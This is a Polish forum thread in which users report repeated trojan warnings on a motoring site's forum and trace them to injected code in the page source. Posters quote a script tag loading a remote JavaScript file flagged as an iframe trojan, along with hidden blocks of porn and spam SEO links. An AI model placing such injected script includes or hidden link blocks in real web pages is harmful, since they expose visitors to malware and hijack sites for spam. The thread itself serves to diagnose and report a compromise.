To tylko źle swiadczy o ich antywirusach. Akurat kaspersky i eset to czolowka i nie dziwne, że właśnie one wylapuja problem.
Win. 7 + Opera/Firefox/IE + ESET Smart Security - Powiadomienie o zablokowanej próbie ataku (trojan) przy KAŻDYM odświeżeniu forum.
Zaskakujące jest to, że części użytkowników ten problem nie dotyczy (albo dotyczy, ale ich antywirusy nie wyłapują, sam nie wiem). Nie zmienia to jednak faktu, że tak duża i szanowana strona powinna się zająć problemem, a póki co nie ma żadnego znaku ze strony administratora czy i kiedy problem zostanie rozwiązany.
To tylko źle swiadczy o ich antywirusach. Akurat kaspersky i eset to czolowka i nie dziwne, że właśnie one wylapuja problem.
DADRL wyłącz światła - włącz myślenie
U mnie sytuacja z trojanem nadal się nie zmieniła. Od 9 dni każde odświeżenie forum skutkuje 'atakiem'. Jak wygląda to u innych? Przyznam szczerze, że irytuje mnie taka sytuacja. Jeżeli dzieje się to tylko i wyłącznie na aG, to znaczy, że to u Was na serwerze coś siedzi. Albo problem jest tak duży, że trwa to tak długo (wtedy przydałaby się jakaś informacja), albo po prostu lejecie na to sikiem prostym... Póki co zrezygnowałem z odwiedzin Waszej strony na wszelakich urządzeniach mobilnych, a jak tak dalej pójdzie to...
Wcześniej wspominałem, że używam ESET SS i nic nie wykrywa a u innych tak, więc chyba nie zależy to od antywirusa. Tym bardziej, że zawsze aktualny (podobnie jak system i aplikacje).Zamieszczone przez genesis
Sprawdzałem w pracy gdzie mamy Symanteca i też nic nie widzi.
U mnie Norton przestał szaleć dobrych kilka dni temu, zarówno w domu jak i we firmie. Sprawdzałem w tym momencie jeszcze przez przetestowanie www pod kątem wirusów, ale też nic nie znajduje:
https://www.virustotal.com/pl/url/7b...is/1381939939/
https://www.siteadvisor.com/sites/ht...ref=safesearch
Napiszę maila do RedNacza jak ma się sytuacja na froncie, bo wiem, że coś działał w tej kwestii.
Na informatyce zupełnie się nie znam, ale spojrzałem sobie na źródło strony forum aG i dokładnie ten fragment kodu:
<script src="http://newtestkal.homeftp.net/tomove.js"></script> w skrypcie Waszej strony ESET Smart Security oznacza jako zagrożenie w formie konia trojańskiego z typu iframe. Poczytałem o tym i działa to na zasadzie dopisywania do kodu jakichś poukrywanych odnośników do zarażonych stron.
Może głupie pytanie, ale masz w Esecie włączone powiadomienia? Bo może być tak, że nie wszystko masz 'zaptaszkowane' w ustawieniach i nawet nie wiesz, że Ci antywir coś blokuje. Możesz też spojrzeć w Kwarantanne czy nie siedzą te trojany (bo u mnie jest ich tam od groma).
Rzeczywiście - miałem wyłączone powiadomienia no i w kwarantannie trochę tego siedzi...
Dzięki za zwrócenie uwagi.
Na końcu strony pojawia się kod:
<!--silinmesin--><font style="overflow: auto; position: absolute; height: 0pt; width: 0pt"><a title="porno" href="http://www.abazapornoizle.com" rel="dofollow">porno</a><a title="film izle" href="http://www.chdfilmizle.net" rel="dofollow">film izle</a></font>
<a href="http://www.forumsamochodowe.pl" title="Forum Motoryzacyjne" target="_blank">Forum Samochodowe</a>.
Panowie zróbcie coś z tym.
Ostatnio unikam czytania forum ze względu na trojany.
Dzisiaj doszły kolejne dziwne objawy. Jak jestem na forum zalogowany to wszystko jest ok, ale jak się wyloguję to język zmienia się na angielski i zamiast polskich liter są same krzaczki.
Panowie! Zróbcie coś z tym, bo problem (z trojanami) trwa już 10 dni, a poprawy nie widać. Jesteście jedną z największych stron w kraju a takie historie reklamy Wam najlepszej nie robią. Jak nie potraficie sobie z tym poradzić to chyba lepszym rozwiązaniem jest po prostu wyłączenie forum, a nie ryzykowanie zainfekowania komputerów odwiedzających (którzy nie mają antywirusów, albo mają kiepskie, które nie wyłapują tego syfu).
Macie włam instalujący wirusy i ukrywający linki porno. Oprócz wyżej wymienionych jest jeszcze warstwa z:
Polecam się pilnie sprawą zająć, bo jak Was google oflaguje to spore straty odnotujecie<div style="display:none">
<a href="http:// www. burunca. org/" title="burun ameliyati">burun ameliyati</a>
<a href="http:// www. burunca. org/" title="burun estetigi">burun estetigi</a>
<a href="http:// www. xtravestiler. org/" title="travesti">travesti</a>
<a href="http:// www. xtravestiler. org/" title="travestiler">travestiler</a>
<a href="http:// www. pornomarka. org/" title="sikis">sikis</a>
<a href="http:// www. pornmark. net/" title="porn tube">porn tube</a>
</div>. Sprawdźcie też dla pewności .htaccess czy nie ma dziwnych przekierowań.
Uprawnienia umieszczania postów
